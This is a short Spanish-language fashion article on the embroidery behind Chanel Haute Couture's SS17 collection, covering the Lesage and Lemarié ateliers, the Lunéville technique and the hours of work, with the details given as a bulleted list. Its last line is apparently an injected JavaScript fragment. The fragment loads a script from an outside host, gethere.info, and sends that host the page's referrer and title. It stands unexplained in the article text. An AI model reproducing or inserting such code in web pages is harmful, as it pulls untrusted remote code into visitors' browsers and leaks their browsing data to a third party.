Desvelamos la magia y el trabajo que requiere un diseño de alta costura de la maison.
Impecables, sobrios, sofisticados y hechos para la mujer contemporánea à la Mademoiselle Coco, los diseños de Chanel Haute Couture logran conquistarnos con su magia y el complejo trabajo que requiere elaborar cada uno de ellos.
Bordados exquisitos, brillantes lentejuelas, delicados drapeados y el inequívoco tweed protagonizan la última colección de la maison, pero, ¿qué hay detrás de esas tan trabajadas texturas? ¿Cómo se confecciona un vestido de la firma francesa?
Las Casas Lesage y Lemarié, que desde hace décadas están encargadas de la opulenta contrucción del embroidery de Chanel, responden los secretos ocultos en cada prenda de HCSS17.
- 68 looks recorrieron la pasarela.
- Cristales y lentejuelas rhodoid plateadas se utilizaron para las creaciones
- La técnica de bordado utilizada fue de Luneville, la cual se aplica en la parte inferior del tejido sobre un bastidor de bordado, sosteniendo con una mano el gancho y la otra moviendo los elementos hacia adelante debajo del bastidor.
- 600 horas de trabajo en los talleres de Lesage fueron necesarias para crear este bordado.
- La parte inferior del vestido fue realizada por la Casa de Lemarié con plumas de avestruz, requiriendo 80 horas de trabajo.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;